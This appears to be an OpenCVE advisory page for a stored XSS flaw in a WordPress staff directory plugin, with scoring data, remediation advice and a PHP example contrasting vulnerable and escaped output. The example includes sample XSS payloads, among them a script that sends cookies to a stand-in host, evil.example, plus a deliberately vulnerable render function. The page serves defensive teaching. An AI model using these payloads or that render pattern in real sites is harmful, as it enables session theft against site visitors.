Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in richardgabriel Staff Directory Plugin: Company Directory staff-directory-pro allows Stored XSS. This issue affects Staff Directory Plugin: Company Directory: from n/a through <= 4.3.
Published: 2025-03-03
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The plugin contains a stored XSS flaw (CWE-79): user-supplied content is saved by the plugin and later rendered into a page without adequate escaping for the HTML context it lands in. An attacker who can place a payload in the affected fields causes the browser of anyone who views the rendered directory to execute attacker-controlled script in the origin of the site. That script can read cookies or other session material the browser exposes, perform actions with the viewing user's privileges, or deface the page.

Affected Systems

The vulnerability affects "Staff Directory Plugin: Company Directory" (slug staff-directory-pro) by the vendor richardgabriel. All versions up to and including 4.3 are listed as affected. This page records no vendor fix or workaround, so a fixed version cannot be confirmed from the information here; check the vendor's changelog before treating a later release as patched.

Risk and Exploitability

The CVSS 3.1 base score of 7.1 is rated High. The vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L reads as: reachable over the network, low attack complexity, no privileges required, user interaction required (a victim must view the poisoned page), changed scope (the payload runs in the victim's browser rather than in the plugin itself), and low impact on each of confidentiality, integrity and availability. The EPSS score below 1% indicates a low observed likelihood of exploitation, the SSVC assessment records no known exploitation and rates the flaw as not automatable with partial technical impact, and the CVE is not in the CISA KEV catalog. Exploitation consists of injecting a payload when a directory entry is added or edited; the stored entry is then rendered to every visitor or administrator who views the directory, so one injection reaches many victims even though the per-victim impact is rated low. The page does not identify which field is affected or which role the submitter needs; the vector's PR:N rating suggests no authenticated role is assumed, so any input path that reaches the directory should be treated as untrusted.

Generated by OpenCVE AI on May 1, 2026 at 14:22 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Staff Directory Plugin: Company Directory as soon as the vendor publishes a release that addresses this issue. The advisory lists all versions through 4.3 as affected and this page records no fixed version, so confirm the fix in the vendor changelog rather than assuming any release newer than 4.3 is safe.
  • If an upgrade is not possible, disable the plugin, or restrict adding and editing directory entries to trusted roles only, and review existing entries for injected markup (script tags, event-handler attributes, javascript: URLs).
  • Until a patch is applied, add output encoding at render time in the plugin's templates, escaping each stored value for the context it is printed into (in WordPress: esc_html() for element text, esc_attr() for attribute values, esc_url() for link targets, wp_kses_post() for fields that must keep limited HTML), and sanitize on save with sanitize_text_field() or wp_kses_post() so stored data is clean even if a template is missed.

Generated by OpenCVE AI on May 1, 2026 at 14:22 UTC.
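The pattern behind a stored XSS of this kind, and the output-encoding fix recommended above, as an added example. This is not the plugin's code and not OpenCVE's: the staff record, the field names and the two render functions are hypothetical, and the esc_html()/esc_attr()/esc_url() shims are defined only so the script runs under a plain `php` CLI; inside WordPress the real helpers of the same name are used instead and the shims are skipped.

```php
<?php
// Added example (not the plugin's code): how a stored XSS in a directory
// plugin arises and how context-aware escaping neutralises it. Field names
// and render functions are hypothetical. The shims below mirror WordPress's
// escaping helpers so this runs stand-alone; inside WordPress the real
// esc_html()/esc_attr()/esc_url() already exist and take precedence.
declare(strict_types=1);

if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_url')) {
    // Simplified stand-in: allow only http(s) and mailto, then attribute-encode.
    function esc_url(string $url): string {
        $url = trim($url);
        if (!preg_match('#^(https?:|mailto:)#i', $url)) {
            return '';
        }
        return esc_attr($url);
    }
}

// Constructed sample record, as an attacker with access to the
// "add staff member" form might submit it (three injection contexts).
$staff = [
    'name'  => 'Alice <script>location="https://evil.example/?c="+document.cookie</script>',
    'title' => 'Engineer" onmouseover="alert(1)',
    'link'  => 'javascript:alert(document.domain)',
];

// Vulnerable pattern: stored values concatenated straight into HTML.
function render_staff_card_vulnerable(array $s): string {
    return '<div class="staff-card" data-title="' . $s['title'] . '">'
         . '<h3>' . $s['name'] . '</h3>'
         . '<a href="' . $s['link'] . '">Contact</a>'
         . '</div>';
}

// Hardened pattern: escape each value for the context it is printed into.
function render_staff_card_safe(array $s): string {
    return '<div class="staff-card" data-title="' . esc_attr($s['title']) . '">'
         . '<h3>' . esc_html($s['name']) . '</h3>'
         . '<a href="' . esc_url($s['link']) . '">Contact</a>'
         . '</div>';
}

// Crude check used only by this example (not a general XSS detector):
// does the markup still carry a live script tag, an injected event-handler
// attribute, or a javascript: link target?
function contains_live_payload(string $html): bool {
    return stripos($html, '<script') !== false
        || preg_match('/"\s+on[a-z]+="/i', $html) === 1
        || stripos($html, 'href="javascript:') !== false;
}

$vuln = render_staff_card_vulnerable($staff);
$safe = render_staff_card_safe($staff);

echo 'vulnerable output carries payload: ' . var_export(contains_live_payload($vuln), true) . "\n";
echo 'hardened output carries payload:   ' . var_export(contains_live_payload($safe), true) . "\n";
echo $safe . "\n";
```

Escaping at output is the control that removes the vulnerability; sanitizing on save (sanitize_text_field() for plain fields, wp_kses_post() where limited HTML is required) is defence in depth, since stored data that was never sanitized will still be rendered by every template. A field that needs to keep formatting should go through wp_kses_post() at render time rather than esc_html(), which would display the tags literally.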

Tracking


Advisories
Source: EUVD
ID: EUVD-2025-5636
Title: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound Staff Directory Plugin: Company Directory allows Stored XSS. This issue affects Staff Directory Plugin: Company Directory: from n/a through 4.3.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type: Metrics cvssV3_1
Values added: {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}


Wed, 01 Apr 2026 23:45:00 +0000

Type: Description
Values removed: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound Staff Directory Plugin: Company Directory allows Stored XSS. This issue affects Staff Directory Plugin: Company Directory: from n/a through 4.3.
Values added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in richardgabriel Staff Directory Plugin: Company Directory staff-directory-pro allows Stored XSS. This issue affects Staff Directory Plugin: Company Directory: from n/a through <= 4.3.
Type: References
Type: Metrics cvssV3_1
Values added: {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}


Tue, 04 Mar 2025 03:45:00 +0000

Type: Metrics ssvc
Values added: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Mon, 03 Mar 2025 13:45:00 +0000

Type: Description
Values added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound Staff Directory Plugin: Company Directory allows Stored XSS. This issue affects Staff Directory Plugin: Company Directory: from n/a through 4.3.
Type: Title
Values added: WordPress Staff Directory Plugin: Company Directory Plugin <= 4.3 - Cross Site Scripting (XSS) vulnerability
Type: Weaknesses
Values added: CWE-79
Type: References
Type: Metrics cvssV3_1
Values added: {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}



MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:11:37.553Z

Reserved: 2025-02-03T13:35:31.279Z

Link: CVE-2025-25165

Vulnrichment

Updated: 2025-03-03T15:59:24.351Z

NVD

Status : Deferred

Published: 2025-03-03T14:15:54.330

Modified: 2026-04-23T15:25:44.050

Link: CVE-2025-25165

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-01T14:30:06Z

Weaknesses